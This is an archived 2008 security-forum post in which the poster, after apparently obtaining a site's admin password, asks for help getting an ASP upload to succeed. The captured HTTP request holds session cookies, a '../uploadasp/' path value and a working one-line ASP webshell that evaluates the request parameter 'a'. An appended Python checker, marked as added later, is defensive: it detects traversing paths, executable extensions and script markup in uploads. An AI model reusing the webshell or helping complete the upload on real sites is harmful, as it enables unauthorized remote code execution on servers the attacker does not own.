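【3.A.S.T】Network Security Enthusiasts' Archiver

jjcd posted on 2008-7-25 13:53

[Discussion] The admin backend allows uploading .asp files, but writing fails?
Translation author: miao2
After a lot of effort I finally got the admin backend password; once inside I found that .asp files can be uploaded, and I couldn't help smiling. :-)
But the upload reports that the write failed:
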
ADODB.Stream 错误 '800a0bbc'

写入文件失败。

This is the captured request:

POST /admin/upload_asp.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxx.com/admin/upload_aspform.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d78c2931029c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xxxxx.com
Content-Length: 761
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTTSDDQ=PPNMLHJDIKINOAIMEOAHHPDH; xoYuStudioUserDj=4; xoYuStudioUserName=admin

-----------------------------7d74e3031029c
Content-Disposition: form-data; name="filepath"

../uploadasp/
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="act"

upload
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="file"; filename="C:\Documents and Settings\et\桌面\eval.asp"
Content-Type: text/plain

<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""a""))")
%>

-----------------------------7d74e3031029c
Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d74e3031029c--



I tried uploading by modifying the path and by adding spaces, but it still doesn't succeed. Could an expert please advise?
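
A server-side check for requests like the capture above, as an added example that is not part of the original post: it parses a multipart/form-data body and flags a traversing storage path, a server-executable file extension, and ASP markup in the file content. The function name, the extension list and the sample request are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes

# Extensions classic ASP/IIS may execute (assumed list; match your handler map).
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx", ".aspx", ".ashx"}
ASP_MARKUP = re.compile(rb"<%|<script[^>]*\brunat\b", re.I)

def inspect_upload(content_type: str, body: bytes) -> list[str]:
    """Return findings for one multipart/form-data request body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    if not msg.is_multipart():
        return ["body does not parse as multipart; reject"]
    findings = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        data = part.get_payload(decode=True) or b""
        if filename is None:
            # Plain field: a client-supplied storage path must not traverse.
            value = data.decode("utf-8", "replace").strip()
            if ".." in value.replace("\\", "/").split("/"):
                findings.append(f"field {name!r}: path traversal in {value!r}")
            continue
        # Keep the last path component; Windows ignores trailing spaces/dots.
        base = re.split(r"[\\/]", filename)[-1].rstrip(" .")
        ext = "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""
        if ext in SCRIPT_EXTS:
            findings.append(f"file {base!r}: server-executable extension {ext}")
        if ASP_MARKUP.search(data):
            findings.append(f"file {base!r}: server-side script markup in body")
    return findings

# Constructed sample modelled on the captured request (not real traffic).
SAMPLE_CT = "multipart/form-data; boundary=----demo123"
SAMPLE_BODY = (
    b"------demo123\r\n"
    b'Content-Disposition: form-data; name="filepath"\r\n\r\n'
    b"../uploadasp/\r\n"
    b"------demo123\r\n"
    b'Content-Disposition: form-data; name="file"; filename="C:\\demo\\eval.asp"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b'<% Response.Write("constructed") %>\r\n'
    b"------demo123--\r\n"
)

if __name__ == "__main__":
    for finding in inspect_upload(SAMPLE_CT, SAMPLE_BODY):
        print(finding)
```

An upload handler would reject the request when the returned list is non-empty, and would choose the storage directory and stored file name itself rather than taking them from the form.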